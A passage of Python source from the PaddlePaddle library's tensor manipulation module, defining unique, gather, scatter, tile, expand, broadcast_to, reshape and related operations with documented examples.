else:
axis = [axis]
attr_dtype = convert_np_dtype_to_dtype_(dtype)
if in_dygraph_mode():
out, inverse, counts = _C_ops.unique_consecutive(
x, 'dtype', attr_dtype, 'return_inverse', return_inverse,
'return_counts', return_counts, 'axis', axis)
outs = [out]
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
if len(outs) == 1:
return outs[0]
return tuple(outs)
check_variable_and_dtype(x, "input",
['float32', 'float64', 'int32', 'int64'],
'unique_consecutive')
check_type(return_inverse, 'return_inverse', bool, 'unique_consecutive')
check_type(return_counts, 'return_counts', bool, 'unique_consecutive')
check_dtype(dtype, 'dtype', ['int32', 'int64'], 'unique_consecutive')
if len(axis) != 0:
check_type(axis[0], 'axis', int, 'unique_consecutive')
helper = LayerHelper('unique_consecutive', **locals())
attrs = {
'dtype': attr_dtype,
"return_inverse": return_inverse,
"return_counts": return_counts,
"axis": axis,
}
out = helper.create_variable_for_type_inference(
dtype=x.dtype, stop_gradient=True)
inverse = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
counts = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
outputs = {"Out": out, "Index": inverse, "Counts": counts}
outs = [out]
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
helper.append_op(
type="unique_consecutive",
inputs={"X": x},
attrs=attrs,
outputs=outputs)
if len(outs) == 1:
return outs[0]
return tuple(outs)
def unique(x,
return_index=False,
return_inverse=False,
return_counts=False,
axis=None,
dtype="int64",
name=None):
r"""
Returns the unique elements of `x` in ascending order.
Args:
        x(Tensor): The input tensor, its data type should be float32, float64, int32, int64.
return_index(bool, optional): If True, also return the indices of the input tensor that
result in the unique Tensor.
return_inverse(bool, optional): If True, also return the indices for where elements in
the original input ended up in the returned unique tensor.
return_counts(bool, optional): If True, also return the counts for each unique element.
axis(int, optional): The axis to apply unique. If None, the input will be flattened.
Default: None.
        dtype(np.dtype|str, optional): The data type of the `indices` or `inverse` tensor: int32 or int64.
Default: int64.
name(str, optional): Name for the operation. For more information, please refer to
:ref:`api_guide_Name`. Default: None.
Returns:
tuple: (out, indices, inverse, counts). `out` is the unique tensor for `x`. `indices` is \
provided only if `return_index` is True. `inverse` is provided only if `return_inverse` \
is True. `counts` is provided only if `return_counts` is True.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 3, 1, 5, 3])
unique = paddle.unique(x)
np_unique = unique.numpy() # [1 2 3 5]
_, indices, inverse, counts = paddle.unique(x, return_index=True, return_inverse=True, return_counts=True)
np_indices = indices.numpy() # [3 0 1 4]
np_inverse = inverse.numpy() # [1 2 2 0 3 2]
np_counts = counts.numpy() # [1 1 3 1]
x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3]])
unique = paddle.unique(x)
np_unique = unique.numpy() # [0 1 2 3]
unique = paddle.unique(x, axis=0)
np_unique = unique.numpy()
# [[2 1 3]
# [3 0 1]]
"""
if axis is None:
axis = []
else:
axis = [axis]
attr_dtype = convert_np_dtype_to_dtype_(dtype)
if in_dygraph_mode():
out, inverse, indices, counts = _C_ops.unique(
x, 'dtype', attr_dtype, 'return_index', return_index,
'return_inverse', return_inverse, 'return_counts', return_counts,
'axis', axis, "is_sorted", True)
outs = [out]
if return_index:
outs.append(indices)
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
if len(outs) == 1:
return outs[0]
return tuple(outs)
check_variable_and_dtype(x, "input",
['float32', 'float64', 'int32', 'int64'], 'unique')
check_type(return_index, 'return_index', bool, 'unique')
check_type(return_inverse, 'return_inverse', bool, 'unique')
check_type(return_counts, 'return_counts', bool, 'unique')
check_dtype(dtype, 'dtype', ['int32', 'int64'], 'unique')
if len(axis) != 0:
check_type(axis[0], 'axis', int, 'unique')
helper = LayerHelper('unique', **locals())
attrs = {
'dtype': attr_dtype,
"return_index": return_index,
"return_inverse": return_inverse,
"return_counts": return_counts,
"axis": axis,
"is_sorted": True
}
out = helper.create_variable_for_type_inference(
dtype=x.dtype, stop_gradient=True)
indices = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
inverse = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
counts = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
outputs = {
"Out": out,
"Indices": indices,
"Index": inverse,
"Counts": counts
}
outs = [out]
if return_index:
outs.append(indices)
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
helper.append_op(
type="unique", inputs={"X": x}, attrs=attrs, outputs=outputs)
if len(outs) == 1:
return outs[0]
return tuple(outs)
def unsqueeze(x, axis, name=None):
"""
Insert single-dimensional entries to the shape of input Tensor ``x``. Takes one
required argument axis, a dimension or list of dimensions that will be inserted.
Dimension indices in axis are as seen in the output tensor.
Note that the output Tensor will share data with origin Tensor and doesn't have a
Tensor copy in ``dygraph`` mode. If you want to use the Tensor copy version,
please use `Tensor.clone` like ``unsqueeze_clone_x = x.unsqueeze(-1).clone()``.
Args:
x (Tensor): The input Tensor to be unsqueezed. Supported data type: float32, float64, bool, int8, int32, int64.
axis (int|list|tuple|Tensor): Indicates the dimensions to be inserted. The data type is ``int32`` .
If ``axis`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``axis`` is a Tensor, it should be an 1-D Tensor .
If ``axis`` is negative, ``axis = axis + ndim(x) + 1``.
name (str|None): Name for this layer. Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: Unsqueezed Tensor with the same data type as input Tensor.
Examples:
.. code-block:: python
import paddle
x = paddle.rand([5, 10])
print(x.shape) # [5, 10]
out1 = paddle.unsqueeze(x, axis=0)
print(out1.shape) # [1, 5, 10]
out2 = paddle.unsqueeze(x, axis=[0, 2])
print(out2.shape) # [1, 5, 1, 10]
axis = paddle.to_tensor([0, 1, 2])
out3 = paddle.unsqueeze(x, axis=axis)
print(out3.shape) # [1, 1, 1, 5, 10]
# out1, out2, out3 share data with x in dygraph mode
x[0, 0] = 10.
print(out1[0, 0, 0]) # [10.]
print(out2[0, 0, 0, 0]) # [10.]
print(out3[0, 0, 0, 0, 0]) # [10.]
"""
return layers.unsqueeze(x, axis, name)
@inplace_apis_in_dygraph_only
def unsqueeze_(x, axis, name=None):
"""
Inplace version of ``unsqueeze`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_unsqueeze`.
"""
if isinstance(axis, int):
axis = [axis]
elif isinstance(axis, Variable):
axis = axis.numpy().tolist()
elif isinstance(axis, (list, tuple)):
axis = [
item.numpy().item(0) if isinstance(item, Variable) else item
for item in axis
]
out, _ = _C_ops.unsqueeze2_(x, 'axes', axis)
return out
def gather(x, index, axis=None, name=None):
"""
Output is obtained by gathering entries of ``axis``
of ``x`` indexed by ``index`` and concatenate them together.
.. code-block:: text
Given:
x = [[1, 2],
[3, 4],
[5, 6]]
index = [1, 2]
axis=[0]
Then:
out = [[3, 4],
[5, 6]]
Args:
x (Tensor): The source input tensor with rank>=1. Supported data type is
int32, int64, float32, float64 and uint8 (only for CPU),
float16 (only for GPU).
index (Tensor): The index input tensor with rank=1. Data type is int32 or int64.
        axis (Tensor|int, optional): The axis of input to be gathered. It can be an int or a Tensor with data type int32 or int64. The default value is None; if None, ``axis`` is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
output (Tensor): The output is a tensor with the same rank as ``x``.
Examples:
.. code-block:: python
import paddle
input = paddle.to_tensor([[1,2],[3,4],[5,6]])
index = paddle.to_tensor([0,1])
output = paddle.gather(input, index, axis=0)
# expected output: [[1,2],[3,4]]
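            # A further illustrative call, output inferred from the gather
            # semantics described above (index [1] along axis 1 picks column 1):
            output_col = paddle.gather(input, paddle.to_tensor([1]), axis=1)
            # expected output: [[2], [4], [6]]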
"""
if axis is None:
axis = 0
if in_dygraph_mode():
axis = axis.item() if isinstance(axis, paddle.Tensor) else axis
return _C_ops.gather(x, index, None, "axis", axis, "overwrite", False)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'gather')
check_variable_and_dtype(index, 'index', ['int32', 'int64'], 'gather')
if isinstance(axis, Variable):
check_variable_and_dtype(axis, 'axis', ['int32', 'int64'], 'gather')
helper = LayerHelper('gather', **locals())
dtype = helper.input_dtype('x')
out = helper.create_variable_for_type_inference(dtype)
if not isinstance(axis, Variable):
helper.append_op(
type="gather",
inputs={"X": x,
"Index": index},
attrs={'axis': axis,
'overwrite': False},
outputs={"Out": out})
else:
helper.append_op(
type="gather",
inputs={"X": x,
"Index": index,
"Axis": axis},
attrs={"overwrite": False},
outputs={"Out": out})
return out
def unbind(input, axis=0):
"""
    Removes a tensor dimension, then splits the input tensor into multiple sub-Tensors.
Args:
input (Tensor): The input variable which is an N-D Tensor, data type being float32, float64, int32 or int64.
axis (int32|int64, optional): A scalar with type ``int32|int64`` shape [1]. The dimension along which to unbind.
If :math:`axis < 0`, the dimension to unbind along is :math:`rank(input) + axis`. Default is 0.
Returns:
list(Tensor): The list of segmented Tensor variables.
Example:
.. code-block:: python
import paddle
import numpy as np
# input is a variable which shape is [3, 4, 5]
np_input = np.random.rand(3, 4, 5).astype('float32')
input = paddle.to_tensor(np_input)
[x0, x1, x2] = paddle.unbind(input, axis=0)
# x0.shape [4, 5]
# x1.shape [4, 5]
# x2.shape [4, 5]
[x0, x1, x2, x3] = paddle.unbind(input, axis=1)
# x0.shape [3, 5]
# x1.shape [3, 5]
# x2.shape [3, 5]
# x3.shape [3, 5]
"""
if not isinstance(axis, (int)):
raise TypeError("The type of 'axis' must be int, but received %s." %
(type(axis)))
if isinstance(axis, np.generic):
axis = np.asscalar(axis)
input_shape = input.shape
axis_ = axis if axis >= 0 else len(input_shape) + axis
num = input_shape[axis_]
if in_dygraph_mode():
return _C_ops.unbind(input, num, 'axis', axis)
helper = LayerHelper("unbind", **locals())
check_type(input, 'input', (Variable), 'unbind')
dtype = helper.input_dtype()
check_dtype(dtype, 'unbind', ['float32', 'float64', 'int32', 'int64'],
'unbind')
outs = [
helper.create_variable_for_type_inference(dtype=helper.input_dtype())
for i in range(num)
]
helper.append_op(
type="unbind",
inputs={"X": input},
outputs={"Out": outs},
attrs={"axis": axis})
return outs
def scatter(x, index, updates, overwrite=True, name=None):
"""
**Scatter Layer**
Output is obtained by updating the input on selected indices based on updates.
.. code-block:: python
import numpy as np
#input:
x = np.array([[1, 1], [2, 2], [3, 3]])
index = np.array([2, 1, 0, 1])
# shape of updates should be the same as x
# shape of updates with dim > 1 should be the same as input
updates = np.array([[1, 1], [2, 2], [3, 3], [4, 4]])
overwrite = False
# calculation:
if not overwrite:
for i in range(len(index)):
x[index[i]] = np.zeros((2))
for i in range(len(index)):
if (overwrite):
x[index[i]] = updates[i]
else:
x[index[i]] += updates[i]
# output:
out = np.array([[3, 3], [6, 6], [1, 1]])
out.shape # [3, 2]
**NOTICE**: The order in which updates are applied is nondeterministic,
so the output will be nondeterministic if index contains duplicates.
Args:
x (Tensor): The input N-D Tensor with ndim>=1. Data type can be float32, float64.
index (Tensor): The index 1-D Tensor. Data type can be int32, int64. The length of index cannot exceed updates's length, and the value in index cannot exceed input's length.
updates (Tensor): update input with updates parameter based on index. shape should be the same as input, and dim value with dim > 1 should be the same as input.
overwrite (bool): The mode that updating the output when there are same indices.
If True, use the overwrite mode to update the output of the same index,
if False, use the accumulate mode to update the output of the same index.Default value is True.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: The output is a Tensor with the same shape as x.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 1], [2, 2], [3, 3]], dtype='float32')
index = paddle.to_tensor([2, 1, 0, 1], dtype='int64')
updates = paddle.to_tensor([[1, 1], [2, 2], [3, 3], [4, 4]], dtype='float32')
output1 = paddle.scatter(x, index, updates, overwrite=False)
# [[3., 3.],
# [6., 6.],
# [1., 1.]]
output2 = paddle.scatter(x, index, updates, overwrite=True)
# CPU device:
# [[3., 3.],
# [4., 4.],
# [1., 1.]]
# GPU device maybe have two results because of the repeated numbers in index
# result 1:
# [[3., 3.],
# [4., 4.],
# [1., 1.]]
# result 2:
# [[3., 3.],
# [2., 2.],
# [1., 1.]]
"""
if in_dygraph_mode():
return _C_ops.scatter(x, index, updates, 'overwrite', overwrite)
check_variable_and_dtype(
x, 'dtype', ['float32', 'float64', 'float16', 'int32', 'int64'],
'scatter')
check_type(overwrite, 'overwrite', bool, 'scatter')
helper = LayerHelper('scatter', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type="scatter",
inputs={"X": x,
"Ids": index,
"Updates": updates},
attrs={'overwrite': overwrite},
outputs={"Out": out})
return out
@inplace_apis_in_dygraph_only
def scatter_(x, index, updates, overwrite=True, name=None):
"""
Inplace version of ``scatter`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_scatter`.
"""
return _C_ops.scatter_(x, index, updates, 'overwrite', overwrite)
def scatter_nd_add(x, index, updates, name=None):
r"""
**Scatter_nd_add Layer**
Output is obtained by applying sparse addition to a single value
or slice in a Tensor.
:attr:`x` is a Tensor with ndim :math:`R`
and :attr:`index` is a Tensor with ndim :math:`K` . Thus, :attr:`index`
has shape :math:`[i_0, i_1, ..., i_{K-2}, Q]` where :math:`Q \leq R` . :attr:`updates`
is a Tensor with ndim :math:`K - 1 + R - Q` and its
shape is :math:`index.shape[:-1] + x.shape[index.shape[-1]:]` .
According to the :math:`[i_0, i_1, ..., i_{K-2}]` of :attr:`index` ,
add the corresponding :attr:`updates` slice to the :attr:`x` slice
which is obtained by the last one dimension of :attr:`index` .
.. code-block:: text
Given:
* Case 1:
x = [0, 1, 2, 3, 4, 5]
index = [[1], [2], [3], [1]]
updates = [9, 10, 11, 12]
we get:
output = [0, 22, 12, 14, 4, 5]
* Case 2:
x = [[65, 17], [-14, -25]]
index = [[], []]
updates = [[[-1, -2], [1, 2]],
[[3, 4], [-3, -4]]]
x.shape = (2, 2)
index.shape = (2, 0)
updates.shape = (2, 2, 2)
we get:
output = [[67, 19], [-16, -27]]
Args:
x (Tensor): The x input. Its dtype should be int32, int64, float32, float64.
index (Tensor): The index input with ndim > 1 and index.shape[-1] <= x.ndim.
Its dtype should be int32 or int64 as it is used as indexes.
updates (Tensor): The updated value of scatter_nd_add op, and it must have the same dtype
as x. It must have the shape index.shape[:-1] + x.shape[index.shape[-1]:].
name (str|None): The output tensor name. If set None, the layer will be named automatically.
Returns:
output (Tensor): The output is a tensor with the same shape and dtype as x.
Examples:
.. code-block:: python
import paddle
import numpy as np
x = paddle.rand(shape=[3, 5, 9, 10], dtype='float32')
updates = paddle.rand(shape=[3, 9, 10], dtype='float32')
index_data = np.array([[1, 1],
[0, 1],
[1, 3]]).astype(np.int64)
index = paddle.to_tensor(index_data)
output = paddle.scatter_nd_add(x, index, updates)
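            # A concrete sketch mirroring Case 1 above (values taken from that case):
            x1 = paddle.to_tensor([0, 1, 2, 3, 4, 5], dtype='float32')
            index1 = paddle.to_tensor([[1], [2], [3], [1]], dtype='int64')
            updates1 = paddle.to_tensor([9, 10, 11, 12], dtype='float32')
            output1 = paddle.scatter_nd_add(x1, index1, updates1)
            # expected: [0., 22., 12., 14., 4., 5.]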
"""
    return layers.scatter_nd_add(x, index, updates, name=name)
def chunk(x, chunks, axis=0, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
chunks(int): The number of tensor to be split along the certain axis.
axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
            If :math:`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Tensor): The list of segmented Tensors.
Example:
.. code-block:: python
import numpy as np
import paddle
# x is a Tensor which shape is [3, 9, 5]
x_np = np.random.random([3, 9, 5]).astype("int32")
x = paddle.to_tensor(x_np)
out0, out1, out2 = paddle.chunk(x, chunks=3, axis=1)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
# axis is negative, the real axis is (rank(x) + axis) which real
# value is 1.
out0, out1, out2 = paddle.chunk(x, chunks=3, axis=-2)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
"""
check_type(chunks, 'chunks', (int), 'chunk')
return paddle.fluid.layers.split(
input=x, num_or_sections=chunks, dim=axis, name=name)
def tile(x, repeat_times, name=None):
"""
Construct a new Tensor by repeating ``x`` the number of times given by ``repeat_times``.
After tiling, the value of the i'th dimension of the output is equal to ``x.shape[i]*repeat_times[i]``.
Both the number of dimensions of ``x`` and the number of elements in ``repeat_times`` should be less than or equal to 6.
Args:
x (Tensor): The input tensor, its data type should be bool, float32, float64, int32 or int64.
repeat_times (Tensor|tuple|list): The number of repeating times. If repeat_times is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If repeat_times is a Tensor, it should be an 1-D Tensor with the data type int32.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.tile(data, repeat_times=[2, 1])
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
out = paddle.tile(data, repeat_times=[2, 2])
np_out = out.numpy()
# [[1, 2, 3, 1, 2, 3], [1, 2, 3, 1, 2, 3]]
repeat_times = paddle.to_tensor([2, 1], dtype='int32')
out = paddle.tile(data, repeat_times=repeat_times)
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.tile(x, 'repeat_times', repeat_times)
check_type(repeat_times, 'repeat_times', (list, tuple, Variable), 'tile')
if isinstance(repeat_times, Variable):
assert len(repeat_times.shape) == 1, (
'repeat_times must be an 1-D Tensor.')
else:
for elem in repeat_times:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in repeat_times must be 1-D Tensors or integers.')
else:
type_tuple = (int, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in repeat_times must be 1-D Tensors or integers.')
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'tile')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
        raise ValueError(
            "When the data type is bool for the input 'x' of the tile op, you "
            "must set its stop_gradient to be True by "
            "some_var.stop_gradient = True, supporting some_var as the input.")
helper = LayerHelper('tile', **locals())
inputs = {"X": [x]}
attrs = {}
def get_attr_repeat_times(list_repeat_times):
attrs_repeat_times = []
for idx, times in enumerate(list_repeat_times):
if isinstance(times, Variable):
attrs_repeat_times.append(-1)
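                # -1 is a placeholder for an element supplied as a Tensor; the
                # concrete value is passed through the repeat_times_tensor input
                # collected below rather than through this attribute.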
else:
attrs_repeat_times.append(times)
assert times > 0, (
"All elements in repeat_times must be positive for tile.")
return attrs_repeat_times
if isinstance(repeat_times, Variable):
repeat_times.stop_gradient = True
inputs['RepeatTimes'] = repeat_times
attrs['repeat_times'] = [-1]
elif isinstance(repeat_times, (list, tuple)):
attrs['repeat_times'] = get_attr_repeat_times(repeat_times)
if utils._contain_var(repeat_times):
inputs['repeat_times_tensor'] = utils._convert_to_tensor_list(
repeat_times)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='tile', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def expand_as(x, y, name=None):
"""
Expand the input tensor ``x`` to the same shape as the input tensor ``y``.
    Both the number of dimensions of ``x`` and ``y`` must be less than or equal to 6, and the number of dimensions of ``y`` must be greater than or equal to that of ``x``. The dimension to expand must have a value of 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
y (Tensor): The input tensor that gives the shape to expand to.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor: A Tensor with the same shape as ``y``. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data_x = paddle.to_tensor([1, 2, 3], 'int32')
data_y = paddle.to_tensor([[1, 2, 3], [4, 5, 6]], 'int32')
out = paddle.expand_as(data_x, data_y)
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.expand_as_v2(x, 'target_shape', y.shape)
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand_as')
check_type(y, 'y', Variable, 'expand_as')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
        raise ValueError(
            "When the data type of input 'x' for expand_as is bool, "
            "you must set its stop_gradient to be True by "
            "some_var.stop_gradient = True, supporting "
            "some_var as the input 'x'.")
inputs = {"X": [x], "Y": [y]}
helper = LayerHelper('expand_as', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_as_v2',
inputs=inputs,
attrs={'target_shape': y.shape},
outputs={'Out': out})
return out
def broadcast_to(x, shape, name=None):
"""
Broadcast the input tensor to a given shape.
Both the number of dimensions of ``x`` and the number of elements in ``shape`` should be less than or equal to 6. The dimension to broadcast to must have a value 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
shape (list|tuple|Tensor): The result shape after broadcasting. The data type is int32. If shape is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If shape is a Tensor, it should be an 1-D Tensor with the data type int32.
The value -1 in shape means keeping the corresponding dimension unchanged.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
N-D Tensor: A Tensor with the given shape. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.broadcast_to(data, shape=[2, 3])
print(out)
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.expand_v2(x, 'shape', shape)
if isinstance(shape, Variable):
assert len(shape.shape) == 1, ('shape must be an 1-D Tensor.')
else:
for elem in shape:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in shape must be 1-D Tensors or integers.')
else:
type_tuple = (int, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in shape must be 1-D Tensors or integers.')
check_variable_and_dtype(x, 'x',
['bool', 'float32', 'float64', 'int32', 'int64'],
'broadcast_to')
check_type(shape, 'shape', (list, tuple, Variable), 'broadcast_to')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
        raise ValueError(
            "When the data type of input 'x' for broadcast_to is bool, "
            "you must set its stop_gradient to be True by "
            "some_var.stop_gradient = True, supporting "
            "some_var as the input.")
inputs = {"X": [x]}
attrs = {}
helper = LayerHelper('expand', **locals())
def get_attr_expand_shape(list_expand_shape):
attrs_expand_shape = []
for idx, shape in enumerate(list_expand_shape):
if isinstance(shape, Variable):
attrs_expand_shape.append(-1)
else:
attrs_expand_shape.append(shape)
assert shape > 0 or shape == -1, (
"All elements in shape of broadcast_to must be positive or -1."
)
return attrs_expand_shape
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs['Shape'] = shape
elif isinstance(shape, (list, tuple)):
attrs['shape'] = get_attr_expand_shape(shape)
if utils._contain_var(shape):
inputs['expand_shapes_tensor'] = utils._convert_to_tensor_list(
shape)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_v2', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def expand(x, shape, name=None):
"""
Expand the input tensor to a given shape.
Both the number of dimensions of ``x`` and the number of elements in ``shape`` should be less than or equal to 6. The dimension to expand must have a value 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
shape (list|tuple|Tensor): The result shape after expanding. The data type is int32. If shape is a list or tuple, all its elements
            should be integers or 1-D Tensors with the data type int32. If shape is a Tensor, it should be a 1-D Tensor with the data type int32.
The value -1 in shape means keeping the corresponding dimension unchanged.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
N-D Tensor: A Tensor with the given shape. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.expand(data, shape=[2, 3])
print(out)
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.expand_v2(x, 'shape', shape)
if isinstance(shape, Variable):
        assert len(shape.shape) == 1, ('shape must be a 1-D Tensor.')
else:
for elem in shape:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in shape must be 1-D Tensors or integers.')
else:
type_tuple = (int, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in shape must be 1-D Tensors or integers.')
check_variable_and_dtype(
x, 'x', ['bool', 'float16', 'float32', 'float64', 'int32', 'int64'],
'expand')
check_type(shape, 'shape', (list, tuple, Variable), 'expand')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError("When the data type of input 'x' for expand is bool, "
"you must set its stop_gradient to be False by "
"some_var.stop_gradient = True, supporting "
"some_var as the input.")
inputs = {"X": [x]}
attrs = {}
helper = LayerHelper('expand', **locals())
def get_attr_expand_shape(list_expand_shape):
attrs_expand_shape = []
for idx, shape in enumerate(list_expand_shape):
if isinstance(shape, Variable):
attrs_expand_shape.append(-2)
else:
attrs_expand_shape.append(shape)
assert shape > 0 or shape == -1, (
"All elements in shape of expand must be positive or -1.")
return attrs_expand_shape
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs['Shape'] = shape
elif isinstance(shape, (list, tuple)):
attrs['shape'] = get_attr_expand_shape(shape)
if utils._contain_var(shape):
inputs['expand_shapes_tensor'] = utils._convert_to_tensor_list(
shape)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_v2', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def reshape(x, shape, name=None):
"""
This operator changes the shape of ``x`` without changing its data.
Note that the output Tensor will share data with origin Tensor and doesn't
have a Tensor copy in ``dygraph`` mode.
If you want to use the Tensor copy version, please use `Tensor.clone` like
``reshape_clone_x = x.reshape([-1]).clone()``.
Some tricks exist when specifying the target shape.
1. -1 means the value of this dimension is inferred from the total element
number of x and remaining dimensions. Thus one and only one dimension can
be set -1.
2. 0 means the actual dimension value is going to be copied from the
corresponding dimension of x. The index of 0s in shape can not exceed
the dimension of x.
Here are some examples to explain it.
1. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [6, 8], the reshape operator will transform x into a 2-D tensor with
    shape [6, 8] while leaving x's data unchanged.
2. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
specified is [2, 3, -1, 2], the reshape operator will transform x into a
    4-D tensor with shape [2, 3, 4, 2] while leaving x's data unchanged. In this
case, one dimension of the target shape is set to -1, the value of this
dimension is inferred from the total element number of x and remaining
dimensions.
3. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [-1, 0, 3, 2], the reshape operator will transform x into a 4-D tensor
    with shape [2, 4, 3, 2] while leaving x's data unchanged. In this case,
besides -1, 0 means the actual dimension value is going to be copied from
the corresponding dimension of x.
Args:
x(Tensor): An N-D Tensor. The data type is ``float32``, ``float64``, ``int32``, ``int64`` or ``bool``
shape(list|tuple|Tensor): Define the target shape. At most one dimension of the target shape can be -1.
The data type is ``int32`` . If ``shape`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
            If ``shape`` is a Tensor, it should be a 1-D Tensor.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A reshaped Tensor with the same data type as ``x``.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.rand([2, 4, 6], dtype="float32")
positive_four = paddle.full([1], 4, "int32")
            out = paddle.reshape(x, [-1, 0, 3, 2])
            print(out.shape)
            # the shape is [2, 4, 3, 2].
            out = paddle.reshape(x, shape=[positive_four, 12])
            print(out.shape)
            # the shape of out is [4, 12].
            shape_tensor = paddle.to_tensor(np.array([8, 6]).astype("int32"))
            out = paddle.reshape(x, shape=shape_tensor)
            print(out.shape)
            # the shape is [8, 6].
# out shares data with x in dygraph mode
x[0, 0, 0] = 10.
print(out[0, 0])
# the value is [10.]
"""
return paddle.fluid.layers.reshape(x=x, shape=shape, name=name)
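# --- Illustrative usage sketch (not part of the upstream Paddle source) ---
# The docstring above notes that in dygraph mode the reshaped tensor shares
# storage with ``x`` and that ``Tensor.clone`` yields an independent copy. A
# minimal, hedged illustration of that difference, assuming a working
# ``paddle`` installation (commented out to avoid import-time side effects):
#
#     import paddle
#     x = paddle.to_tensor([1.0, 2.0, 3.0, 4.0])
#     shared = paddle.reshape(x, [2, 2])          # shares data with x
#     copied = paddle.reshape(x, [2, 2]).clone()  # independent copy
#     x[0] = 100.0
#     # expected: shared[0, 0] becomes 100.0 while copied[0, 0] stays 1.0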
@inplace_apis_in_dygraph_only
def reshape_(x, shape, name=None):
"""
Inplace version of ``reshape`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_reshape`.
"""
if isinstance(shape, (list, tuple)):
shape = [
item.numpy().item(0) if isinstance(item, Variable) else item
for item in shape
]
out, _ = _C_ops.reshape2_(x, None, 'shape', shape)
return out
